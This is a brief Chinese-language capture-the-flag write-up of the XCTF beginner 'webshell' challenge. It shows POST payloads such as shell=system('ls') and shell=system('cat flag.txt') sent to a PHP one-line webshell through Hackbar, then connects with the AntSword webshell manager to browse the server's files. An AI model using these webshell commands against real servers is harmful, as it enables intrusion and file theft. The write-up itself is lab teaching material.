webshell xctf 攻防世界 web新手练习区

该题可以有两种常用的方法作答

进入题目场景可以看见一段小木马，可以用Hackbar工具或中国蚁剑解答

第一种：使用Hackbar插件工具

1.勾选Hackbar插件中的“Post data”，然后构造如下POST请求来查看目录：

shell=system('ls');

构造如下POST请求来查看flag文件：

shell=system('cat flag.txt');

2.也有其它的命令

查找所有与flag相关文件

shell=system("find / -name 'flag*'");

然后再构造查看flag文件的payload：

shell=system("cat /var/www/html/flag.txt");

第2种：中国蚁剑

进入中国蚁剑后，先添加数据，填上URL，连接密码就是那个短小精悍的一句话木马里的值：shell,然后点击左上角的添加即可

添加成功后，双击打开即可

打开就可以看到这个网页的所有目录和里面的内容

点开flag.txt即可查看里面的flag